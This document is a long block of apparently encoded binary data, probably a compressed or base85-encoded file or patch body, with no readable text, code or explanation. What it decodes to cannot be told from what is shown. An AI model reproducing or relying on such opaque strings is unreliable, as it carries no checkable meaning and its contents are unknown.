zk#FdwCj=gy-1C}p<#>J?+X+y%beDh8l+bqW7|Z7+sD~Tl$TR-Z8mmpKSu>lq(Nk^K z0d|%3&!kJn_a5TgP5F3LXw4|xN0>gfU&~T`cLo=gty9bs79@&G%UIHpa1{D5Az4es zk39gg-FDQ#}r*hLW9VpP(6&l%d)&4@ZtHf^;DG{ z-CwI7c|@17Tt}(tE?sYkU=uWob~s!igUf?bX|au*34jo~v7(Z8)-n3$fY&lZ-_j~zT*QoSxZ*=iuP$C`&9i29cBqK0}RbJ z&R@#jpQO&R2ztSjLxa;apLR&kt(tOX2r*!<&de=08%ny;kMi133o|rxJ@=!qK*`6D zyo?cN;;X!#h*-_zG0iq+`k?y*J^ohqUzSQ@p}xEXpE3r4RiTS@5l@F!PQubJV4HbKdF} zkuTG;{f2m2Roa-YF5zV0Mj`%OJ9*&79x@B;ytlT9c*4-W$Hd?NAka$*uea*Fyb$bBRQm|NqqZ>Vb%rGavflL zvTyVDn>!CS#VScX64`?6E(b*##(%81gSt2pj6wE2 zFt3x&<}Q-e!Rtv}qeGVl>5s3hN5Y5)bzd~hk>1yPQ}JfLvtl&gcmyCG-j*LezrN5> zq6PtTzXI+$OtybQPF9rw95#Ri*>bct@JPrua{bJ`c|_z3Ba~l2evqG@EN8Cb0t z$}N{j4|yi2HY~V$JRZ&m7}$TKX%h8g^sC5m2$Lco?VDDKDgs)ff}#9@aWe5;E)N-= zb|TVsPLrbdn{G~SAc!r$pG004h{T0bl0YAUg{}zJXcoYh&$(h)qsb9cer*c!FG-eA zkTHar8!8ux(@;!*KLeB3;jTM(H&l)adu?wT1oXmg-ePBSLTt-idIMRbdu%}^)PV55 ztuSCB8E}^`y;+7?$q{5i5FsQ9jpKrw_a~?+A??g=`b*B*4XHej+FJ$F)w+QLo8v+?er}WZ~#C3bs1lXtA@>C%JRu2Ar=s^U8W_YWS)|6e2f-K zU#u={*kv|X(8pu=)(65d4_CllX%&+}_i2KU8sMGde zM3EH(R{<3z45URtP>@tmy1NyIkWf-U8pTBg6c|G3?k;ImKtkz8q-zN2hI8E`?z8)k z^WwZYym&qvJ`2qJ=Dx4%o0Sb<93xM~zRUjBvkMgdiH2+CE?~Fq0*YqLEy)qazZH1J zR6$$mq;7fZ3Q-|Rayr^S1F5Z>gb;vG42o$pK);W5)P;1k>N$YrZ3d{k#qqmmv@s%R z=G0A_CcDbaApPwok{}@dvkPb$>V|8`P`RB&-@h~O>vBK>_5qWzGq#wqS1)~bA)Y%2 z0AwPo29Ng7!{Py*xC>hFLJ7w-n>LC)Cm}b5dVxAFnSFNB2z+RKLkc2KnH~m(G`(`j z-7az1M?li(F?F@@*chAwm*n0g6IcL!Q+X~2(J^Ayzv&oL3(g zmNB{@oA>Dnj?*r8E+uZLQ)MdL1f7f}q;qOzxY zh-q_YrlzLO$^FIFJ`!|a>NJ1AYS14bG5nbPbz=wzz3Rohk*wZmi?X`4hb52ALw>^G z*NfV~uHE8=Jj~r`8^HfItr^;bO`INGz`R64oZj8-AG_V~khy<&9utwpM0mYJeY36B zHPpx+euW|F3?l3zZamyk{vZKKl^#Am>5V%fACU(#YM=?CTil3T*LW-2J>aTI%D{D& z%5?d-moE9i;4YLo^^C_Nh*{-ZPAf_DCtXn;&a~M1(C}bVxONy=9!8gNF?AE zLm2g0S9r7n>HC9Jn7@!bDsl|G5)>zyQ{9j}txngO#9l;c_5Ku*5CD|(@+Mft7nOO0 zYA`6~t5zD>iDg;)Fq6;RqiZVaQ!rl&Zo6p)ncC~r8LTAQO1INe^ThrAB|a|R8IHwX z>%bH(@XT6It}XGVoGq-58^4s$DdG$d#(sjA5YGTCWomP^t`q2zB{pSTht!{K? z`sY#Jn{=qc&xAM7OsH*}T7Lx(OVz&0ZlOG!dL+yJ!yEBWHfQLZj;74Da9^?M;Rl^o zX>UQb1+zrTm@>~5jQ(P@i8$^WT8^DHDXr2P9PIdJ`mRjIR%3W5w9LiBYCo~B3d0Jw zILg4Xv!z7$p@OeUVju_KD`4$)dwYZmB})E6<5lX4nBSNSTF8ig#g3SJ-iMVYPMEA_k4V{ zy2c#~-uNws$r@4uI(49dt733p&c~GbR&}K286MkaR`tUZY^K~Kp0SY_5WAX^g7PAp zq5dN-&;HAW<|D6|45`45fFGgODdsIY{(NO1d?ESBFM4G??taJod&6|6U&PReZ%u2_ zHyb;Ibc4o1L3xZvelgD8IShBdedh>;{;x>c&`cqi)xKzC6@FVTr+!7;`OqkkTz_vW zTZrU&_?Cx_*{Zaf`qmo>3;cwb?1OL-RwcG%a7)l!y(GOp)TME2X<@N=SwS4ww zKZQ%odQ^F$EIXXezlO(kvU!4A$!#_rRX`%am!Pw-;vs6%Z@fl29BS zJo1|n+mhFOoBHzcUibMIfvOG=D8>yxVRsKf{}1TP4iVzEyMB>cGpM8D*AV(fKwL}X z^M$XM9ck({3p&hy;4)H)#E@@qfEp10KA0p2&|iJ2hb!}JUwy>ei}!j^RWb;%kByD6 zXs!Zpdvr`+W%uLwP?n7+d*`2f-=4wsuN{S&pURK)G3k%K`y*kihDPv*D-$7h@az!7 zz^@h%f;&hBQBE8z>P!#z`aHix1n-{3tF(~pC3=d2I&b3Ge8wJzx#b0LCvUt@;LE#` zQg9AI%PCBpSNQMBBX}QGMm*z$3)x)BE3{3T|jEs zP2h|?;?z((6b>S4y}_aRAZt28Zu~dlMT;lA&itG3l6tt3+OZwyeoe!Yzy z5Z5-GpuxYGnIV%**HMlbGJ4n|5hi#uWv&*Fb;vEQIh-OF;|cz#FKF_FG*+d|j`)w;)Nni??PUsFFDM70Qhsq@3q&aMrgkvHAjb&U zJ{okB@cHRAu??$Y^kMqoTg?THj`@)$5Ju`p1c~;BK-D&A6*f2eVXkzzyaQP3ivO{e z977ohqiCE4Fnp=uDa4yO?tpxLYrXXliCG4aBKdan4|Fc$7g@M-@v!RKd(_5gpvgQ? zVGvdSSmYvbztoymVdx1p6(b3+{})syeRJ>tvqpYu&?DwoRQUE6AlDWKZeG-DmB}Dy zQv73fR8nXbps>>162&C>O3fVbT&+10RWM1YRHSdSXyi8pt-@N6Ggem!u*o)vf3K20 zZpHSl07^YonM*iW(C<)>`o>A$VL)iF3>Zf-cm%dB@1Ur-b)Ik(M+di35wQ!CUBK_Lr)`Wqf9HCWavrNXl^}s5rY{Ozvvhk#vT_@T>RT zQQ&dHDHhcM%ut=+c#wDlc2v1~3yd}M1EsKxDpCaJ#=mWt@;ibv~ zCs&4MK_$Y}q1X267bjR)rvX`6wP-j`)L(ZZ#lH~1wXuefoUH4bm6_tT$mr9$E(h!x zX$QHg3CqGBSXRpROZHitC!TTg5vWiXG4}KIKQGA%Ua>dR2^sy5tTSa=Q*C)GAS@x; z?_PV_J2qG!D7x^lUim8ie$jYQ zO>NRQ4|~vT;` zt-Vx(ss=1GN;JgjCze4MRFCXE^?(OSk1~yR@M3f6!_Udy)eL!pd2iEt+K8wD-c1Ao z&y8&Z(rPEmZ{By4H2xFJ8()=c9lO5gr()Xf=)!$=<&3S@d>%JQ8IfwBU3ZYVqMa_mymVQa^yW#42A~@l z9+PHxr(Ns9i$Euk2=rSoi2*b8bJp9i&VZ!;NAV+*(88ieDU9k9AnjXzy#^S@BTz)F z_>6mDx<8n?z>KtVWuhmZI;H42b4t2JTXg!6x=QC%N1~)aU#6}I zOn{*y<4KwI-3Io~o?BtNS8j;K-e88$347aw=ymFog7a}W%^x7u16FWy!4=01 z;*q%`f#0ed|BO-^o{i)iLzOn3BD?D6IKRU$3|INSM3%meIo;nEzuy_sR2%MeqqYYW z-c|11=#MPG!Vw{R;ux*Or75Ye(epQN@naoIezAOC)OgcTNfz3i8~V*3$+a+ z`m!&m22deCBn^YeMBmAf{68T%R!j$*7$a5b-W|&t^n~>T~L{wJE!O82W8Db8(Ik^fl zeC>cBkb^oGiPV8WtcN>$dh_OFtUp4Y@@jGbbA)yUsqKhA_fk{-0%{lYZd3C6m@`l&#-XLCHDYJ=dCsg z4sdgpVeK-<4^rT?Kp@8Mj>j>cFQ}6eWhTx5zp%4iiy2JHCnl({Wu{iZl^b;sWq81B z7TG0#oDb}qn=t*R{`1o6$|zZQ8Ds$-IRK&A=D^#5$Vyb`SPT|F5YOBP0*6T_AI#)x z06J`M=51RWJ%wvF4}><=!1VJ!1-rrxbFjJ2__*VY;95F^${HEIK{})!j0QmC-D*J8 zH>oF(F~jv_ZO8WX7>J`Z%)13f54g{L5oFKNN>ZpK4pha9OCRzxOgZCSJlqB*y?w&Y^LTJ>&vn z(gSb$=)T-{zKnkbt}l-F!V;Yd0g7kOMj%A*2&7KFML9C;92}+3ZpFH)3fUw=c1idL zq}NFU{RS8K7EHRcki~(IehBM((I2X-)({b&#Dhf(cc2tZC>8utHPb^%=7QkF-|a)^t@s#GlJtA z%jN=7X;T0QwSB@_`ubsFG=sM_9|T7mPH3|1%}GVIl##+oV6;VwQIKNYkLWl(jf#Sx zx5E^kwgT{Sbph6p29EZ!62wKrlh+Gph#|5p>8MLcHOGQKN*Rfb_LzrkxRQVDUxiV& z8{I&-ORX!4che=FFurmIN0CD(%+dK0Z|xq>bmOebe7imKR%(}Bh$OOG^FWCJ-E0Q> z(brnv`=?u_)f-V+HC(GaN5G8^EjWj+9F8Y2l>)NcAEi@1-@%`-|C2n=r_|mOp7sNJ z>5O|CPQkWm|2+je38RrwAW}W#lSVi$9HN6`i|noFR(awo=c~u~xf4!Y3A(|Z_8upi zoCf&$IPvColU{j1KVoH$eg)b$SC^!sL%EOg9cK~drJAD1;LJFNsB?Fn;~&Q-$OxI0 zE0@!ty{#6gkkRAz=xoOJOLE6drRt<8=M^V8@ujvdinR$oGgDg ze)N`sX7I-BjViR$CTFQN^&w3${LF$KafMq*^anrgouDE4G9JoT#2wet_ayfF^yyM# z-Wu`N`TW5D8NnU9>r}h+QwsRMgY8Of`9B)g)XRf!X$w10JqHN#-z2KP6EQNv|F;Dz zKkH2yUEd+~`n5AIG}eDywyBXAuV%3dlbYR9>F~P*FtNmAQuwr)gNpw#`m2#q_&6P% z9c=`10#*9u0&q@jWl52a7tLE`-?~3Q_DVR0!rS2UMNs0P>_N(uMSPbwCAcSiLpm<^h5fdx(v+#gv+FaVv$+hOqyb=awbnqO=KK{pLV~Xw} zl-vQT5@Q&;j&=aYqHyU1X<8{uDBhq+g3`zPPa9RZ?nABtHE`3I!Sk697M%koBaJZT zcszygWp=7!h53QFat++~j5eHlP3XQRF#t(6&=}Um(67L2<%Cpf$QuAE_I#u#@9fUJ zk8e3CD}nMy6khipc>+#i?;()#p9@nW62ySM@J#AkkzQk%@jy3YK5Xq=@cv~!hyIu2 zc>V=Sr!qnJ*9G0%KVYXryV$%j4ICahu+ZO9^;^9*k~br)K8N%x003_+fvRzvyJ?jQ zEPAN+Y}1h&1Q$;B7iL_5rf}Br-G+573n^WIrXSsGZxo{!LM0eFDvht4oe4;Uq&^Po zM8~l=h-2&UI@Xa+_^jxIz%UQ;?4QzxymY_Is&ae-}my6J*X z`FK$ABrMUySa53A+a`q~`UwL1X7(kL=@%z45V!yXkOuoMbs;DOmjmC*_H$cL$dW$R zu^S{JeMoNfLT$ao=X{3Q3v)Q&!M@Omua1M`wo_t?T#}i<8CZ{L7^ZT8@F6luFoZjF zhmU6#-S~)?EglWjNJUZSV5jH?QvojlvFu~$_}d+>v}qvIMUN>_l%NG9bl|O?AQ=K^ zvo_pr=n$ATe>i@~E~~r!161(T6DV>H`6Pc|pPg?Nq`9j&`jeAcRMJCd0F|?Cle=fu zApdF>H3(2QoU$&i&7~rWf*L@7!#MITYGmv)K4!cDg~>~)CG3@OHRV9X@a0B5QN!LW z)rS53kTzGd9|srMrlYrBCwp2sOepFwGeIAQZ5fMJkFPY##8agr0dU{m0#MWGJ&#%> z=6?KH!Aju^S+rJEN{{h#4*^-IxDU2eDNvd23y6MJ8Wy3?m^V@bf(QUMu0tS@cLB29 zM~l32XAOqCnYD1W0B&s?y~k{xo@m1%qrK ztZLbp@IN)4S`J~(>^SsX76{7iO|pO#?$GR^x}NbD+3mk9e^fen%ipRliJ%bBgFnQB ze0JUOJx7A)k()pwTFH_ZB8o`Kuz6bG-eZg4u}OAmPv-$hqh1dqtU9ePy6trLLIjYCY7m2ro!M+H2JD zI1N?Ii&>q~V9$^x!P(JQmmFzdbod@x2n(ii<7jf6ywQ}sv$sD6Le*03hOxjyWV3|4E#Cndw z`6EtxKLfS(`iG%5){>d;G|3Eo7n(_Sy{aCZogOauMoNJ}(YvtLJw8e%K$6Y|w=fz? z;I0!u=$%@sJ1%E#tEmILd5LCUmiED53174>9qGQ^Q%A48G6>|VXA#*`k~*gWw4$7* zFv}BPW`L}Lw1$WPkGk{XAPfw&x#o9xxUv+`(;KAe`|E~sO+%yEBg8L1* z*74RhgjVp+O5R`P5{SN(Cx8~ zWmYkFoV7$gt&6H>zbv5eVNm~?!n|A{dg%cu0!ae(Q6Q}q~;_>wFPGAWe)BHk?{j)BwH;Y||+{6%~-5kUC>6~&ioncsB7A#Vnsi?fedp+ywd zD3;z5xDts>_Ny(0H$5GM`~29L=|h10oNp(?>9FGrdu(6zDy6Gg<5YxmemMn8u93mB zXs`>tyh!vJ>DEosKU51e(CjhayRzl5-w>N%w7UPNowO+^3~mkOc*!&G0Z5d20cqG5 z(XufO@4k$Q04$n_k8jTNTjZ2JQNRa^1!y8`y z%`y~T1RKH%rY_h83=()2X{8X{_WU{_0yFe)%YF?3nMf353MtDAb4ix3N=n^bA3Br^x8U;I+o;kFX1Zi4&q4gue7dGYAATjC9 zd$rcE$T)NkfC1o2a844co}Fq-(nBy~`3l@3su}Ezu$^ZfbTz9jqATy+AZKQw^i5-p zcY%*vRByagtTcP+9r1vrije>J6niBj~lA{c)10n0yJhwaIsiQGYNS&bK@Wb zTckzN@<c2}%Da$-?Y9sDH~dY$Ok6>T&^vsAEW7J9)4sOc~Bz z*d&F7jV)`V2p9yzb*_leAJB)ymYpuLfigJ1!sXh;{s^P}QV*%G2B1}qLD{{q{{ddq z$*~K*kK0#kc>j_=1nC2yG9K_{WjS@FVMmUA(k87lQ#uy~F;M@7<0R1SB~vTtXG!)n zxT_C&OBMld-`?wmhle6@(k_B~|N<8UK4}XBDraShC#;_FJ-E+h8O5y1hTEns;qqw>ez!1v9=gS}j zimO)q)U)h{x@XMHTA)>QNhR5u1K$Q7Cs_UmPQbX99%`JLn!W2qPj9V5&tg4vA+}}f z>ZkPOa|11r8k7>b&J4* zbcakaFY=@q%8y{%pK0bLvb-vT&@_gQ>jvs^pAptfpoWRZv-IzfinB(HSyt(>Bg`+o zP!vW3dRP{l)0)hS$-3%COHYjEMaZ%QY8OyoeElb%avG@7wUO|&{e{}Q$|6cA-!KZw zP#k1G&*v#T^~V(^RuwP%At_%DDhKI+IAz)G4P3_NP3tiDQELJiLa)5sj?tH^dbUA( zDg1G>iOTmCn+GHnT%s-!LoSra9L*pUK-G_jD9mahOK;)~2T`||VtDegYG{;gl3+P2 zLszgp4T}TyO?vJ4DInCOpO)nN48za8YSG1`J;Tg$iWGZA%fY`wEr_3l?dWBuQYGb^ zH|q3FHj#t%D*f)#w!@C~N1+16My;V>Q#p^DnAukkb{Xv38fiaF4a37$uPjHXdv<8t z`69Z5$W%x!wTGxur6}D^J2D6QHGO0(k^dQrNI0_9%{x*cTk>9Ye=bf^;{^X z!PF_Sr~7=Fa!9LC|6bNE%&KI|9pY~5eVBB=G*trSTe_BDeeaVh1XNr*@&?*!PrUUy zq`rSvz|@?aRBaE_2s*9c&q%aF;y71?yW$c$DQ{d@Ez10t@{48thduE%ku$gtt&1)B zX1y1B1zwVt>MU_6F1t;PCr-i!S)U-nci?*NZ7Q72kmw!GfV>XbKL~oGQ_G$3zl#DB zo048C$|Dm9K%WHa>nRFPk_p%pk?SZH9C?Gf(i9j?h}|E4e$r#WefnO|g=EbS*?`x4 zV=IW8Q}E=f~3Ql-HaTsDI@(~d|5@hA*)@yR&!)wYRB2MH*&yGqL&=}_u1 zi)6Ww(G;bId0wA*7Le!_9^cN$9~+TFXu_G@>cyhvDXnzT%jpjS(_4<2id%CJFD>|{ z46WYisyWHFL{xj-0Hzz$GlMt3US(F6H+l_13ix1d@+&{ph&f?HwDC|D+t(loW)e6N z13-8_Jkw4On|{Jr5CWH@cC}HPlMES55_mU^me$xctOM%{RTjVd&DQVzV1jw3crXRW zw+pl@|B8CIA*Q~ds$v6Zxu5mMNz*E4#0UsZRN(^+iQ>$=nCz9fRJ?235{=~9`Dyb^CBfYgKiYm#59tf_EjZ{J~!dGo3};@KhB zNBrYH-C}5T?cC$rD@yJqQoie+RjI!47VmMDJrdC7X;6_b`44<(8hQ^Ln$Et%7tOvt z4yw~P1w*Gb?|Gy^RvUb|6227PX})OiHrR>R4NsDv4KayalT*9tIy4M#Bb#;zu9Z4B z7@Pf<()6FNKF^(i|3v08{O78C-Em+BW&sB%C%AcKsvb2g8}AwhD(z)fk$50+7kmfz zmb}8DU6ga>%8TM8p|gonav#Gn6m^exgXSf{(A5Kh0h6D2VWS+^HJ^vF_~LH3bjc;j z)4qN%Gi}_u-Kkb-^V(++K9dsv7qDb`6tN~2hDFBfduE#jOteKbbYJ}upZ&Mob388s zKz=pYRJV5mo6@yzx!VVbqT87DgqNx1QxLVeb7oI$7XZtyio|qKg_aMeJHM*mC}=eE zVA$+NHntz-M$OT>VjB>EZw#irK*&^Tg-;Q2L_$_FkYgVZONoky@JY3h&a{Y$vZnU% zDF@Lib*_m93PaeX7Q2qH5~v_@5^y-T;j{?ffJmaC%$oXBpyQR6Zs};01(7u|9y$#v ziO4Rv?u7+QTDuO)`y&mc_^x+PFw5o~QuV&f0&>712Mg|-HR5-`HEg_y!ec_goUqGO z`_jw_Evp%ZVbF%}1md?cNwpL>O?y$>Y-Qg|9j9B+oC;W%7{?n83d}@wQgQJ z5_tz1J0{mg3t#e+V2l&Hke!{l4DV7Oy{P&!3lz|@xoHi)(AV_$%CTZK)iH|?*sw!;D znbjTGZ+cyRjUqg~hbC9I;a*Jz(6=(QoE0*%Wd2fySO=E~UxYu+ZOF>;*=|WqKAfYV z-aTm&Az8>^Vt(S+R&&W#KuIvQ;UglokzioGHsC|Yi+n%|`GWOq>lhQ(UgV?4ARpoq zZo#K?2EtLZ0KTJF{lvRg2Hmr~KRaIJl&r*LKXz*BT>X-bso(M#0$j`xoIKgc44VLM zAb!*~>Zqfx)9nwsf-gw_iT9Nud#%fESC*cW3!H?Dq}zk@;5_x&8Psue5ygZedY{x< zJ-+5tGEh9I!T^EVKN40zHl_pYNb5AB5y$V*Jiu}~z$qc6R*cvasAr$iakIW;d)Ngf zNkN6OGrM@@D`_J{i+K1bE)}89;vCE=fNxAtOEDm%O$q3z>xCbjugMr94jK<5(#VH* zL6kH&U{X3Z`!R-|d~M>udvNJ_DiT&wZ+$BYzD0u&9U5)jd zx^}5`Q=;*?^P|bnnoM=kIH!cwiSsYc4J|Ge3)9a9@cn>S28E9-{NO-FhlrbP^OO2N zkjWPZeSbBxa5e8TsUu`;W6mE1#2>pkK(Oo71%w@MK^RL|O(u85D}8RWd*8E{H=5@j zZS%rqbssf0c*KpBZz8@QRE&48(mx_{nzr9|Y0Vv`DzSW8UQRat2VD|-QuHWd#Uf~B3C^`-k`uk-kz0iuxeJ-k^{VcW^pRbf zdh!(=M)M)VQ8deE{h=cvZ zoHM4LBqpCgB@ob;GQ9Of*PLXdYjI=UR3KY?3_sGvD>5aM&M@sN1m30zg%=FY8)R%G zZQjsLXZb6e9kdG)1X%A45bbdJbSoa;g2mNblm7emv!(Nr7|#vaxL*sxyes!x_J?&0 zxcx8cq{$1J{aNeYFyx?ISO=KQ<8;LxPLyb;@N@FNahTYGmzh{FcI- z52WNylrjw&yy&_y(+gnvoX8l2TjncARMKlu&v3MOxh?t8Nov(Xn5=_4y z_k4OFkL+LlkQaCgWSVLdu?XheQk3kd3o=k5)jgo8?wkz*(}`OOqsbe`ldAPeF5F=X z>xaktM&Mslp90asLIMlRo9cDO;kYs0DCE@eSQ7R+b7n?n^g9WQuo@R8&!&WFru796 zc7q(%^}0V*Q>09ij3V65oPTc))=>so4~7Ahru$mA%SdwH>uiUlM8y?&(i$i-8D41y zSl?!O8*jzzuN3FSK3=Dd%bIu=O4z!^>nZHuvW?T(UC`B{r}UdV@N6X^t9m0W%A)i> zwjPe3ar#lke(IJ(A0F#$Y{%%%1EuhDoTns-@~&HSojvE02>oflQ6LfQ`8=D(9It@Y zEDUUI4()HGou}+YMatj9AHZ)$B-Vtt>Dg_zYDpIH _IXl|cqZ&NLL$G1;uBop( zA^65UPR-l$7`Qe`70J(;l-#!*zmG}!G@u@0PSi^IBa|Uy`&rA;WAaV}?W;_<==qe5 zrUZ*89J3ENw!h2wj`Q_bJX4rZ=rkl z=bLa+BH;Ct&!3|7^po6vPbNC`>{)gmw1$=4h#h7_?g{Mj(~B%P<-1CXA~7{syVl_O zKI)W_{25suU!nZZR_8yM-J`z~fK~R?_PuihGiMVm-%F-6Z6q*gr{BC7nZh^m*(mxW z|4NB7e{a~D#2`kveSY#Z?tr!|!~VGIrFj3#M<99gEk*uIq< zr1yTIh;g~|u+D$h&W!3s^|0|d+tWtRMu*Nj(Mlf+#WEg&g>2(ZQmTY`KyAkg=hz7b zmats;=_1xztdmzCN&5=rQXQR>)s6Glrv$Wl=1#%Yigw$)M|>-?!QK={xtoi6oS8^Y zlOInW)XXl)XI-~H@_zHfo09w(|7c2F#`F`r)~mE(EcPH$@W{)qZf8C%9V_YlKtw@~ z_t#6H`Z=1X6I+xBbF8Tp$t5MO#Q9LBn2s01-UY33Pc6?bK7leUJ1!}j_}e506seQ4 znkjE2T(gVXn!Oidi79Q1Qt50|(oG|MvhfDXR2(WPRLp>k*K5;r1tG+j!9wxmiz?#x&@jmYm>>^|Y^D z+ECn|7MdN()TwkewzHJS$%K#SvlmtBa#@=RC)AFYU8gcQe20WZX)3KkC&P-U^SvfROe>e5Jd&q(?~) zxnxX~Q68Vtf4-71*S`JJDb0MEQX@6|2&F*U_JqFsJNrp{1r;31_CT54GjW{8+Th5;)2#g5t?(HW3#YZkaqM0ysKk)(=n=c0!*$3`VSumo<49&Utp>Ugmjp4 z>16({sm*|@`lQsWZ`m)An75N_eywSHCKlu)78@@|l1grxxR`20g(>1JlMk^YI>gPn zUp$sHkdisE`qo3?xMLrC@+n34tw&jEl*%l?xn@-6=>vNA)hHk45;~terDZR79nRtn6h<;SUe|?lIwwEOO0>P<6kQXk zecUUEu*2?tsiDmY!Jt$g;PAG^iFocaP|~OV5GYbEcMvf8o+&9%V3x3XT3>?q)H-)~ z$;4_Xp$XA9p0~*-8I#pX_Wz7_nD*;zG%P-`n?vcfbrD>IG%_PRfNGeU-RCw8PGe#W z$dauc0$+(vq(zLNMW7vM4>VLPO1{~Ya@`qzYjY4S6>nUaXpm8=l+nLhn|U+Ul-mt( zz|EM4SCNDRv}4oqbT62CmG#&;>%=%$$bhWYzLX+!6M;@&Zg_W}gE-VD=}N;KoTn75 zK+2teW3Z}VFUy#LcJ5Eg-502{kL)5{UeuXPR)sq`peAC4tul|i*weu9Xo2b_ag^~|(nt`{X~X?L1LWKv@h`Ps9HYW(vI7u_ zoeBiJEg-P!AX#?OUf=^Pg z<9qHF5WIQda9n3^zS#^KmjepjFr0sZDF4CL#U5#+{t|oJQLKtOkQLL2M2E$%`>#JQ zvQR8W7kZy4NLWTfWE74MgA@PZjdIq?L9gcw6sN-{*NT@Lo&wAKF>%54j1{$?2rm(HkE0?F5q zIE>WO|9Nk##qZ<>9Ubrcw@Er|UOT)-$rBiWg|m*HabkkDv*)6ApWcb z)gMJ_2wh)z_6MF>q*dMD1j#t&4JAK*YvBbmSR4Qh=iQ&`f2htnA^J)d*cN{T*GAm5 zc#wJN72zUmy)_XWSX1W62yQEb%r=y+HSfRwpP9@8`_3nm$l7Z8im5%pOweVGXoM`G z^G4>J5tWngrJ&~tR_A~e$2;}C zx;>{b~u6;3lw`%8kZ@s9{6Z((AhN}W^_f8b+f)g3y30{ z+~m|&6DrP6qSbM8T;PhsrzlS&3g@=~FlP)vvBF0j2;mTLCdy~}p`4lS1QK{iRxSzH z29tO;;MAWzG{P!m?`p>_z&rdaQED!_CUhFOn}r!vO4Hd4OXjRaC@fRX_NR!(30(c? zO>`AMNB>#gWpkAfjNW8tNp50Cm6TP^C}NyoZNiHo0K#FARjytIjbRQ->)5~W*>aBK z+s#ioS-|2g7!yT%cIQ5qe&F9yrpo-RHUKIrxq_up0tT-yXfb`Aq^RC4gC*?*vvdtNvtIIi<9Un^I5ti2 zf_BS?J8`;KVxc89FwZCPwYtzKC`YDSqx$mw`!Z9nlH{-wjgUNB)_kT&oj#zrr+c3t z;5JRftKPZ7HQ#^+fVMCp%JNUJx_>tX1$|}cM~T&&aE4Lz?I#FO75a!baX*mOi&v8G zgFI?d=T%te&T^TmX11k*^_PD~ZC{rAPryjNL;Lxrt}z8B5~krZ4~b@A=ZlefVcGi) zqBX{K+Rxu2#~RZgT;i4^NSW`Tcjy0w4U)p;9 zQI}UvE?iJ__2yCz5kY|IynuxEub!ww(X^JZgZG^-p-X}42j48^$DxUcW*<~nGa+)U zr5mjED~ORd$I7L&aocYd)P-V`lmnxT48=C?C7;hzts?hr0b~uK?2i^|(&oQ{Q-CtmN-A^#3d{_ZlL=UiTC;@80 zKpmm~CuaB1f1YauO2gU6=!Z!U;8YHpF1hsRUQn;RYkJlvh>~hq0yWGxfIWCNJIi-Q zE1z7jSymp?z%hPN^uKD;+QFFyA_*0pdwK~rd^iB~9ad+MDxM~yT89S6+MPVhSYRE+Cb?DW*A95a0@ZfOz50cc9WJGNfQU$>XK}{m@%D*C7ny9Zc&{_a!wC`yzpUFyt3&aG0wa@+t#ds!|{AC zl2j2QU%3f~l_+nlk1(^1uNn(nGNMlF#M>62chc~Dr|nfeM#w-7&@dH94E`2_k6`8Y zH0~K+-tj%Py-II5SX5;CfXSwp|Iu5~fZuA%i}5&3;?-YD2>x|Z=Dj>f+0%dS`tD)W zADh|>k=#&lUg!=73=01kLJB+$mV3O}U){yS8PfPlHI1w(ivHQ>c8{r$RV?!6Z!P7k zfsGQo$6wzBg_6nXU2I(sb;vZCnO zgD;33?hQehJ$%Wk{{Dx-lVc>3*MBGK5Q8kRt~daeH$ zGx&E}C-Ex$VQo}wHK4uo8b}Uv0L|Y2e&P0W2UA#Y56lpjF znqz9Rl{vb-1c{d?Z4QsiYob3#Kz8s~M&y5jA(_ z@1DehuB!GV1;gQ+chh1l0*X)sr0vH;^j)av6=32JHkqY=#Br_IKwrhI-UUe9s?j}4 z&~;mpTpFL2o9~IvB?PmeI#QHV1cs|U9sUdw+yiFb4QvwznY=x3M?uO&HzFFm|3a{7 z{l?Oy9-MTUU}L(edYB-e%s2g4Nb~6D2iK4k&vd#g3rX?R0FZ-JW$QS62qZY0%t4W! zg>HKun<;%@!12Q!&&JMP0s#hf;{j}kG=`=i(+r=K7I9mJu1J*SwklbGMxpITnQf+k zE!uwN>{Lb8H%J6PQxvg8cG)U2#Ibw`WbVRG1lQ-x=vy4>zOVt>oj@-gY6O~(rMX)G z5zin1a@`X7!54&kb^#^cDii-kgL)Sl0Hj&imIh!~h6mrfFbnbwbL8Aw-e-FE&tJKg zw?WlDgQ}R3@}cHD^6pmp^`U4c>MbO-NAU=#x*i|T{QC84UGH+pP(EK66eixJ<2WzU zXbq_QH;KBFPQ+c1LS=ns?qud+yUz6dZArbReTfGR$sL>1BihzAI`BK~@Em>!9YA#%knfxQDk zvv8puv|7xE$myp|sTLh16xeNL+gn;B4dl=Ip^!KntE~I9&!WaYo;!9Doks}ZX*`gj zQSc2e>9f1q*mS&X^0V^4Ws{6)W-q!o{-bl;Lc@KK@isEJr-9C0HVzeCR5ftG>Z{Dv2@o%?LUmWp5NIHd z1;*1~+tf*tr`t^)K5X0%&lk1izOHi*)V%Ose;`DG;g2wMQ|eFqHpp~R=7qZ^Ru)L{ z{%~&PLt~KG?Ga}$L4Q?6Fii4C0bJ7M0#M+Lk|A=wD>{UI%Ln!VSF;NfG?7)daE#p3 zAusxA$f{jxSVr|BW<9y{riIVq;=TMLaujRAZp!qEuG$}z{bRm>87+bY`KPgLDX-P( zT8gZdc`B1S*uX-GwDsE5{gB*1Dz1Pj=e&HYdmr&RUF4{hwYP?+*Ky0*Qumy=VQ*1i z7mVx!af2r>OTw`x=b8o?0d~w*X{Kv{TMyO;@R7bRtOb_<->YMhcBsgQpn@Xqgeg%C z$#sYf>d-Y0L~R)`zdS{Sxx~2-o8k=g9-fHzvz&x_HJ!#Hv$5E^=msRXKZ+c%${gG3j*%NhkJTHV8fph^ZG1w^20(zJ$y&sv|yJ)-pUHeWmF z;uNXVXdU1Q>sQlsvli9E0&_m2HVO*GO}ZqqSRA`HY!Rd#b<$FGxl(BfGq}x;3>}bf zgo$^xPfNNz-6PwnkG#+eZT+5~KIjDZcsDApqH2Wa*>JZ9BLC)O)6EB`c>kN2(fLpY zJEm@pouKO8&1V-+q_y!GWF6%)`&h+)F~nI6Wm{h~6^@;U&Q#jGy?kdJTu?49;YlI^Yuri*y<&Kb=vrbB^l4&b>xcSy_O@@w7U8 z3lcAM%a4E&?AHbl9)mxA@!=?}2nKk_s`&sn66!=gTjOj@<;~YRgLZBd9F$%(#RQ9A zqoaK^kWPPR7H8mh?0fhfdjXvZs|ln3MYq2^3QJ!$Wbbcovqpgq@I7C!&IilU>Tx!F z+N*nBRw)Y9LB~G+*g7+T*-$S zP-X_|5ZB??tswZJ{0|$!+5)^5_5)geBjimezK6@8A=ta%za;o%m9{<=n%h^}Xqo+Z 